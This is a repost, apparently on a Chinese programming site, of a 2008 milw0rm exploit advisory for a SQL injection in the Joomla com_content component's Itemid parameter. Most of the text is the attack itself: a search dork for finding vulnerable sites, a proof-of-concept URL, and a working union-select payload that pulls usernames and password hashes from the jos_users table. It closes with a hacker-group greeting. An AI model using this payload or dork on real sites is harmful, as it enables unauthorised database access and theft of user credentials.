欢迎来到福编程网,本站提供各种互联网专业知识!

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

发布时间:1970-01-01 作者:佚名 来源:互联网
-------------------------------------------------------------------------------------------JoomlaComponentcom_contentSQLInjectionVulnerabity------------------
-------------------------------------------------------------------------------------------

Joomla Component com_content SQL Injection Vulnerabity

-------------------------------------------------------------------------------------------

Author : unknown_styler

Dork : inurl:com_content

POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*

------------------------------------------------------------------------------------------------------------------------------------

Greetings : h4ck-y0u.org

side note:

Página de contenido

Projecte Joomla!

July 2004

(C) 2005 Open Source Matters. All rights reserved.

http://www.gnu.org/copyleft/gpl.html GNU/GPL

admin@joomla.org

www.joomla.org

1.0.0

# milw0rm.com [2008-07-08]

相关推荐